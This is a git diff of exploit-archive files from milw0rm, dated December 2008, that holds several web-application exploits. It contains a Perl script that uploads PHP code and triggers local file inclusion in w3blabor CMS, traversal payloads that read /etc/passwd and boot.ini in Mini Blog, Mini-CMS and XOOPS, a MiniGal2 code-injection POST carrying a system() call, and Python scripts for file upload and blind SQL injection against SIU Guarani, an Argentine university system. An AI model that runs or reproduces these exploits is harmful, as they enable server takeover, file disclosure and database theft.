Response...: xx.xx.2008 +# +# [!] Background.: Sicher! Schnell! Einfach! +# Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe +# abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der +# angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im +# Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht +# es zu etwas Besonderem! +# +# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges) +# +# 71: if (isset($_GET['action']) && $_GET['action'] == "upload") { +# +# 80: $dir = "../../includes/media"; +# 81: $file = $_FILES['datei']['name']; +# +# 92: $file = strtolower($file); +# 93: +# 94: move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file); +# 95: @chmod("".$dir.""/"".$file."", 0777); +# +# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges) +# +# 45: $neueslogo = $_FILES['neueslogo']['name']; +# 46: $logopfad = "../../includes/upload/".$settings['page_logo'].""; +# 47: +# 48: $endung = substr ($_FILES['neueslogo']['name'], -3); +# 49: +# 50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) { +# +# 54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo); +# +# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off) +# +# 43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; +# 44: +# 45: if (file_exists($modulfile)) { +# 46: +# 47: include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; +# +# [!] 
Solution...: no update from vendor till now +# + +if(!$ARGV[4]) +{ + print "\n \\#'#/ "; + print "\n (-.-) "; + print "\n ----------------oOO---(_)---OOo----------------"; + print "\n | w3blabor v3.0.5 Arbitrary File Upload & LFI |"; + print "\n | coded by DNX |"; + print "\n -----------------------------------------------"; + print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>"; + print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg"; + print "\n[!] Targets:"; + print "\n -1 Upload over media.inc.php"; + print "\n -2 Upload over meinlogo.inc.php"; + print "\n[!] Options:"; + print "\n[!] -f [filename] Path to local file with php code"; + print "\n -p [ip:port] Proxy support"; + print "\n"; + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $file = ""; +my %options = (); +GetOptions(\%options, "1", "2", "f=s", "p=s"); + +if($options{"f"}) +{ + $file = $options{"f"}; + if(!-e $file) + { + print "[!] Failed, local file doesn't exist.\n"; + exit; + } +} +else +{ + print "[!] Failed, see usage.\n"; + exit; +} + +print "[!] Exploiting...\n"; + +use_bug($host, $path, $file); + +print "[!] 
Exploit done\n"; + +sub use_bug +{ + my $host = shift; + my $path = shift; + my $file = shift; + + my $ua = LWP::UserAgent->new(); + my $url = ""; + my $url2 = ""; + my $req = ""; + $file =~ /.*[\/|\\](.*)/; + my $filename = $1; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + if($options{"1"}) + { + $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload'; + $url2 = 'http://'.$host.$path.'includes/media/'.$filename; + $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ]; + } + if($options{"2"}) + { + if($file =~ m/.*\.jpg|peg|png|gif/i) + { + $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload'; + $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00'; + $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ]; + } + else + { + print "[!] Failed, rename your local file to .jpg\n"; + exit; + } + } + + $ua->request($req); + my $res = $ua->get($url2); + if($res->is_success) + { + print "[!] File uploaded\n"; + print "[!] Check your file @ ".$url2."\n"; + } + else + { + print "[!] Failed\n"; + } +} + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7374.txt b/platforms/php/webapps/7374.txt index ae597f9d7..bdbd9553c 100755 --- a/platforms/php/webapps/7374.txt +++ b/platforms/php/webapps/7374.txt 
@@ -1,47 +1,47 @@ -/* - - $Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ - - Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities - Discovered by cOndemned - - Download : http://www.bpowerhouse.info/mini_blog.htm - - Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* - -*/ - -Source of index.php - - [...] - - 7. $page = !empty($_GET['page']) ? $_GET['page'] : ""; - 8. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; - - [...] - - 77. if (($page != "") && file_exists("page/" . $page . ".php")) { - 78. require("page/" . $page . ".php"); - 79. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { - 80. require("admin/" . $admin . ".php"); - - [...] - - -Proof of Concept - - http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00 - http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00 - - for example request : - - http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00 - - ...might give result like this : - - root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon... - - -EoF - -# milw0rm.com [2008-12-07] +/* + + $Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ + + Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities + Discovered by cOndemned + + Download : http://www.bpowerhouse.info/mini_blog.htm + + Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* + +*/ + +Source of index.php + + [...] + + 7. $page = !empty($_GET['page']) ? $_GET['page'] : ""; + 8. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; + + [...] + + 77. if (($page != "") && file_exists("page/" . $page . ".php")) { + 78. require("page/" . $page . ".php"); + 79. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { + 80. require("admin/" . $admin . ".php"); + + [...] 
+ + +Proof of Concept + + http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00 + http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00 + + for example request : + + http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00 + + ...might give result like this : + + root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon... + + +EoF + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7375.txt b/platforms/php/webapps/7375.txt index 90d4cfb39..5c69c46e2 100755 --- a/platforms/php/webapps/7375.txt +++ b/platforms/php/webapps/7375.txt 
@@ -1,43 +1,43 @@ -/* - - $Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ - - Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities - Discovered by cOndemned - - Download : http://www.bpowerhouse.info/mini_cms.htm - - Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* - -*/ - -Source of index.php - - [...] - - 9. $page = !empty($_GET['page']) ? $_GET['page'] : "home"; - 10. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; - - [...] - - 80. if (($page != "") && file_exists("page/" . $page . ".php")) { - 81. require("page/" . $page . ".php"); - 82. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { - 83. require("admin/" . $admin . ".php"); - - [...] - - -Proof of Concept - - http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00 - http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00 - - -It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... -Maybe double fail ? x] - - -EoF - -# milw0rm.com [2008-12-07] +/* + + $Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ + + Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities + Discovered by cOndemned + + Download : http://www.bpowerhouse.info/mini_cms.htm + + Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* + +*/ + +Source of index.php + + [...] + + 9. $page = !empty($_GET['page']) ? $_GET['page'] : "home"; + 10. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; + + [...] + + 80. if (($page != "") && file_exists("page/" . $page . ".php")) { + 81. require("page/" . $page . ".php"); + 82. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { + 83. require("admin/" . $admin . ".php"); + + [...] 
+ + +Proof of Concept + + http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00 + http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00 + + +It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... +Maybe double fail ? x] + + +EoF + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7377.txt b/platforms/php/webapps/7377.txt index 802570b7d..19c151c9c 100755 --- a/platforms/php/webapps/7377.txt +++ b/platforms/php/webapps/7377.txt 
@@ -1,21 +1,21 @@ - ############### Yee7.Com ############### - ############### zAx ################# - PHPmyGallery Gold 1.51 (index.php) Folders Disclosure - ----------------------------------------------------------------------------------------------------------- - - [+] Script : PHPmyGallery Gold 1.51 - [+] Vuln. : Folders Disclosure - [+] Download :http://phpmygallery.kapierich.net/en/downloads/ - [+] Discovered By : zAx [ThE-zAx@Hotmail.Com] - [+] Team: Electronic Security Team (Yee7.Com) - -Exploit : http://site/phpmygallery/index.php?group=../somefolder - - [+]Somefolder is any folder in the vulnerable website - [+] ../ = Up from this folder - [+] You can see all folders those are in "somefolder" - - -[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ] - -# milw0rm.com [2008-12-07] + ############### Yee7.Com ############### + ############### zAx ################# + PHPmyGallery Gold 1.51 (index.php) Folders Disclosure + ----------------------------------------------------------------------------------------------------------- + + [+] Script : PHPmyGallery Gold 1.51 + [+] Vuln. : Folders Disclosure + [+] Download :http://phpmygallery.kapierich.net/en/downloads/ + [+] Discovered By : zAx [ThE-zAx@Hotmail.Com] + [+] Team: Electronic Security Team (Yee7.Com) + +Exploit : http://site/phpmygallery/index.php?group=../somefolder + + [+]Somefolder is any folder in the vulnerable website + [+] ../ = Up from this folder + [+] You can see all folders those are in "somefolder" + + +[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ] + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7379.txt b/platforms/php/webapps/7379.txt index 2fc6ce00f..6e6fae5ef 100755 --- a/platforms/php/webapps/7379.txt +++ b/platforms/php/webapps/7379.txt 
@@ -1,73 +1,73 @@ -<?php - /**********000000000000----------------------000\\\ -/*-00--------++++++++++++++++++_______________)_)_________ - -- -- - - MiniGal2(MG2) v0.5.1 remote Code Injection | - ___ Z okazji urodzin ¿yczê sobie wszystkiego zajebistego - Zawsze na odwrót lol '''''_---" - ___)()())0 ------------ - \ A-L | """""" - '--==9** Victoria heh . ------- gr:SID.PSYCHO ;> and rest and ALL - ---------++++++++++++=================)) - ___ -- =======-- - ./.................. -=======--////- - VULN:[includes\mg2_functions.php] - function writecomments($filename) __LINE 555 - --------- - function writecomments($filename) { - $filename = "pictures/" . $filename; - unset($buffer); - if (count($this->comments) != 0) { - for ($i=0; $i < count($this->comments); $i++){ - for ($j=0; $j < count($this->comments[$i]); $j++){ - $buffer .= "*" . $this->comments[$i][$j]; - } - $buffer .= "\n"; - $fd = fopen($filename,"w+"); - if (flock($fd, LOCK_EX)) { // do an exclusive lock - ftruncate($fd, 0); - fwrite($fd, $buffer); - flock($fd, LOCK_UN); // release the lock - fclose($fd); - $this->log("Wrote comment to '$filename'"); - } else { - $this->log("ERROR: Could not lock commentfile '$filename' for writing"); - echo "MG2 ERROR: Could not lock $filename (function 'writecomments')"; - } - } - } else unlink($filename); - } - /\/\/\/\/\/\/\/\/\/\/\ - - function addcomment() { - $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']); - $_REQUEST['input'] = $this->charfix($_REQUEST['input']); - $_REQUEST['email'] = $this->charfix($_REQUEST['email']); - $_REQUEST['name'] = $this->charfix($_REQUEST['name']); - $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>"); - $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']); - $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']); - if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") { - $this->readcomments("pictures/" . 
$_REQUEST['filename'] . ".comment"); - $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0); - $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0); - $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0); - if (count($comment_exists) == 0) { - $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']); - $this->writecomments($_REQUEST['filename'] . ".comment"); - .....etc // -................-------------------------------------------===================== -==== As you can se THE input data is not enough filtered - We can write self code in to the file - by sending proper POSTS - ex: - POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5 - THE END - --------*/ -// ALFONS LUJA just 4 fUn :P -?> - -# milw0rm.com [2008-12-08] +<?php + /**********000000000000----------------------000\\\ +/*-00--------++++++++++++++++++_______________)_)_________ + -- -- + - MiniGal2(MG2) v0.5.1 remote Code Injection | + ___ Z okazji urodzin ¿yczê sobie wszystkiego zajebistego + Zawsze na odwrót lol '''''_---" + ___)()())0 ------------ + \ A-L | """""" + '--==9** Victoria heh . +------ gr:SID.PSYCHO ;> and rest and ALL + ---------++++++++++++=================)) + ___ -- =======-- + ./.................. +=======--////- + VULN:[includes\mg2_functions.php] + function writecomments($filename) __LINE 555 + --------- + function writecomments($filename) { + $filename = "pictures/" . $filename; + unset($buffer); + if (count($this->comments) != 0) { + for ($i=0; $i < count($this->comments); $i++){ + for ($j=0; $j < count($this->comments[$i]); $j++){ + $buffer .= "*" . 
$this->comments[$i][$j]; + } + $buffer .= "\n"; + $fd = fopen($filename,"w+"); + if (flock($fd, LOCK_EX)) { // do an exclusive lock + ftruncate($fd, 0); + fwrite($fd, $buffer); + flock($fd, LOCK_UN); // release the lock + fclose($fd); + $this->log("Wrote comment to '$filename'"); + } else { + $this->log("ERROR: Could not lock commentfile '$filename' for writing"); + echo "MG2 ERROR: Could not lock $filename (function 'writecomments')"; + } + } + } else unlink($filename); + } + /\/\/\/\/\/\/\/\/\/\/\ + + function addcomment() { + $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']); + $_REQUEST['input'] = $this->charfix($_REQUEST['input']); + $_REQUEST['email'] = $this->charfix($_REQUEST['email']); + $_REQUEST['name'] = $this->charfix($_REQUEST['name']); + $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>"); + $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']); + $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']); + if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") { + $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment"); + $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0); + $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0); + $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0); + if (count($comment_exists) == 0) { + $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']); + $this->writecomments($_REQUEST['filename'] . 
".comment"); + .....etc // +................-------------------------------------------===================== +==== As you can se THE input data is not enough filtered + We can write self code in to the file + by sending proper POSTS + ex: + POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5 + THE END + +-------*/ +// ALFONS LUJA just 4 fUn :P +?> + +# milw0rm.com [2008-12-08] diff --git a/platforms/php/webapps/7380.txt b/platforms/php/webapps/7380.txt index 2df14f2f3..4cd0b8331 100755 --- a/platforms/php/webapps/7380.txt +++ b/platforms/php/webapps/7380.txt 
@@ -1,86 +1,86 @@ -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040 - - -Application: XOOPS -Versions Affected: 2.3.1 -Vendor URL: http://www.xoops.org/ -Bug: Multiple Local File Include -Exploits: YES -Reported: 10.11.2008 -Vendor response: 10.11.2008 -Solution: YES -Date of Public Advisory: 08.12.2008 -Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - -XOOPS has Multiple Local File Include vulnerabilities. - - - -Details -******* - -Local File Include vulnerability found in scripts: - -xoops_lib/modules/protector/blocks.php -xoops_lib/modules/protector/main.php - -Successful exploitation requires that "register_globals" is enabled. - -Code ----- -################################################# - -$mytrustdirname = basename( dirname( __FILE__ ) ) ; -$mytrustdirpath = dirname( __FILE__ ) ; - -// language files -$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ; -if( file_exists( "$mydirpath/language/$language/main.php" ) ) { - // user customized language file (already read by common.php) - // include_once "$mydirpath/language/$language/main.php" ; -} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) { - // default language file - include_once "$mytrustdirpath/language/$language/main.php" ; -... - -################################################# - -For successful exploitation first condition in if..else statement must be not true. - -Example: - -http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00 -http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00 - - - -Solution -******** - -Vendor fixed this flaw on 26.11.2008. 
- -XOOPS 2.3.2a Security Release can be download from Sourceforge repository: - -https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010 - -Release notes: - -http://www.xoops.org/modules/news/article.php?storyid=4540 - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-12-08] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040 + + +Application: XOOPS +Versions Affected: 2.3.1 +Vendor URL: http://www.xoops.org/ +Bug: Multiple Local File Include +Exploits: YES +Reported: 10.11.2008 +Vendor response: 10.11.2008 +Solution: YES +Date of Public Advisory: 08.12.2008 +Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +XOOPS has Multiple Local File Include vulnerabilities. + + + +Details +******* + +Local File Include vulnerability found in scripts: + +xoops_lib/modules/protector/blocks.php +xoops_lib/modules/protector/main.php + +Successful exploitation requires that "register_globals" is enabled. + +Code +---- +################################################# + +$mytrustdirname = basename( dirname( __FILE__ ) ) ; +$mytrustdirpath = dirname( __FILE__ ) ; + +// language files +$language = empty( $xoopsConfig['language'] ) ? 
'english' : $xoopsConfig['language'] ; +if( file_exists( "$mydirpath/language/$language/main.php" ) ) { + // user customized language file (already read by common.php) + // include_once "$mydirpath/language/$language/main.php" ; +} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) { + // default language file + include_once "$mytrustdirpath/language/$language/main.php" ; +... + +################################################# + +For successful exploitation first condition in if..else statement must be not true. + +Example: + +http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00 +http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00 + + + +Solution +******** + +Vendor fixed this flaw on 26.11.2008. + +XOOPS 2.3.2a Security Release can be download from Sourceforge repository: + +https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010 + +Release notes: + +http://www.xoops.org/modules/news/article.php?storyid=4540 + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-12-08] diff --git a/platforms/php/webapps/7381.txt b/platforms/php/webapps/7381.txt index ad779d35b..032a5fcdd 100755 --- a/platforms/php/webapps/7381.txt +++ b/platforms/php/webapps/7381.txt 
@@ -1,212 +1,212 @@ - # - # # # - ### # ## - ##### multiple remote vulnerabilities - ############ siu guarani - ###### - ## # ## - # - - -general information -------------------- -bug type : multiple remote vulnerabilities - -software name : SIU Guarani - -vendor : SIU (www.siu.edu.ar) - -authors : proudhon & Ubik - -date : the 341st day of the year 2008 - -contact : N/A - -description : SIU-Guarani is a web application which keeps information about academic activities. It's widely used in Argentina by national -universities. for more information, contact the vendor's web page. - -disclaimer ---------- -all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any -damage. - -technical information ---------------------- -disclosure of database information -^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -you can get some of the database information, such as user and password, used by Guarani. this bug is almost fixed by the vendor. -http://guarani_server/includes/elegirConexion.php - -file upload -^^^^^^^^^^^ -given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions. -http://guarani_server/a_docentes/subirArchivo.php - -sql injection -^^^^^^^^^^^^^ -http://guarani_server/w_inicial.php -OR -http://guarani_server/inicial.php - -Username (Identificacion): ' || (SQL Statement) || ' -Password (Clave): **** (anything) - -example: -Username (Identificacion): ' || DBINFO('dbhostname') || ' -Password (Clave): **** (anything) - -just remember they are using Informix! -sql injection is partialy solved in some places. - -in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '. - -blind sql injection -^^^^^^^^^^^^^^^^^^^ -hidden parameter "operacion" in: - -http://guarani_server/a_general/verMensajes.php -http://guarani_server/a_general/autentificarse.php - -... and probably more! 
- -example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || ' - -another example (in autentificarse.php): - -operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || ' -(no error, because it returns a single value) -operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || ' -(error, because there are multiple results) - -patchs / work arounds ---------------------- -among other things, the function which loads the foreign parameters should check for special characters. -the software itself seems to be pretty buggy, releasing the software code under a license like BSD or GPL would help to improve its security. - -proof of concept ----------------- -file upload -^^^^^^^^^^^ -#!/bin/python -# target : SIU Guarani -# file : 4790 -# quote : "el poporembo como una flor", quintin -# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be -# responsible for any damage. - -import pycurl -import StringIO -import sys - -if len(sys.argv) < 3: - print "SIU guarani file upload" - print "usage : " + sys.argv[0] + " <server> <local file>" - print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg" - sys.exit(1) - -print "getting phpsessid.." -c = pycurl.Curl() -c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php") -c.setopt(c.COOKIEJAR, "/tmp/guaranicookie") -c.setopt(c.WRITEFUNCTION, (lambda x : None)) -c.perform() -c.close() - -print "uploading file.." 
-r = StringIO.StringIO() -c = pycurl.Curl() -c.setopt(c.POST, 1) -c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php") -c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))]) -c.setopt(c.COOKIEFILE, "/tmp/guaranicookie") -c.setopt(c.WRITEFUNCTION, r.write) -c.perform() -r.seek(0) -s = r.read() -r.close() -c.close() -s = (s.split("'../library/bajarArchivo.php?qs="))[1] -s = (s.split("'"))[0] -print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s -print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser" -# EOF - -bind sql injection -^^^^^^^^^^^^^^^^^^ -#!/bin/python -# target : SIU Guarani -# file : 4791 -# quote : "el poporembo como una flor", quintin -# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be -# responsible for any damage. - -import pycurl -import StringIO -import sys - -def dic_sql(s, i, x, y): - num = "SUBSTRING(" + s + " FROM " + str(i) + " FOR 1)" - return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')" - -maxsize = 32 - -if len(sys.argv) < 3: - print "SIU guarani blind sql execution" - print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]" - print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER" - print "remember, it's an informix database" - print "https support!" - sys.exit(1) - -if len(sys.argv) > 3: - maxsize = int(sys.argv[3]) - -print "getting phpsessid.." -c = pycurl.Curl() - -if (sys.argv[1][0:5] == "https"): - c.setopt(c.SSL_VERIFYPEER, 0) -c.setopt(c.URL, sys.argv[1] + "/inicial.php") -c.setopt(c.COOKIEJAR, "/tmp/guaranicookie") -c.setopt(c.WRITEFUNCTION, (lambda x : None)) -c.perform() -c.close() - -print "cracking sql result.." 
- -for l in range(1, maxsize + 1): - i = 48 - f = 125 - c = pycurl.Curl() - r = StringIO.StringIO() - if (sys.argv[1][0:5] == "https"): - c.setopt(c.SSL_VERIFYPEER, 0) - c.setopt(c.POST, 1) - c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php") - c.setopt(c.COOKIEFILE, "/tmp/guaranicookie") - c.setopt(c.WRITEFUNCTION, r.write) - - while i <> f: - sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2) - c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")]) - c.perform() - r.seek(0) - s = r.read() - r.truncate(0) - if len(s) == 0: - print "uhm... looks like a wrong sql string!" - sys.exit(1) - if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1: - f = i + (f - i) / 2 - else: - i = i + (f - i) / 2 + 1 - r.close() - c.close() - if i == 125: - break - sys.stdout.write(chr(i)) - sys.stdout.flush() -sys.stdout.write('\n') -# EOF - -# milw0rm.com [2008-12-08] + # + # # # + ### # ## + ##### multiple remote vulnerabilities + ############ siu guarani + ###### + ## # ## + # + + +general information +------------------- +bug type : multiple remote vulnerabilities + +software name : SIU Guarani + +vendor : SIU (www.siu.edu.ar) + +authors : proudhon & Ubik + +date : the 341st day of the year 2008 + +contact : N/A + +description : SIU-Guarani is a web application which keeps information about academic activities. It's widely used in Argentina by national +universities. for more information, contact the vendor's web page. + +disclaimer +--------- +all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any +damage. + +technical information +--------------------- +disclosure of database information +^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +you can get some of the database information, such as user and password, used by Guarani. this bug is almost fixed by the vendor. 
+http://guarani_server/includes/elegirConexion.php + +file upload +^^^^^^^^^^^ +given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions. +http://guarani_server/a_docentes/subirArchivo.php + +sql injection +^^^^^^^^^^^^^ +http://guarani_server/w_inicial.php +OR +http://guarani_server/inicial.php + +Username (Identificacion): ' || (SQL Statement) || ' +Password (Clave): **** (anything) + +example: +Username (Identificacion): ' || DBINFO('dbhostname') || ' +Password (Clave): **** (anything) + +just remember they are using Informix! +sql injection is partialy solved in some places. + +in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '. + +blind sql injection +^^^^^^^^^^^^^^^^^^^ +hidden parameter "operacion" in: + +http://guarani_server/a_general/verMensajes.php +http://guarani_server/a_general/autentificarse.php + +... and probably more! + +example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || ' + +another example (in autentificarse.php): + +operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || ' +(no error, because it returns a single value) +operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || ' +(error, because there are multiple results) + +patchs / work arounds +--------------------- +among other things, the function which loads the foreign parameters should check for special characters. +the software itself seems to be pretty buggy, releasing the software code under a license like BSD or GPL would help to improve its security. + +proof of concept +---------------- +file upload +^^^^^^^^^^^ +#!/bin/python +# target : SIU Guarani +# file : 4790 +# quote : "el poporembo como una flor", quintin +# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. 
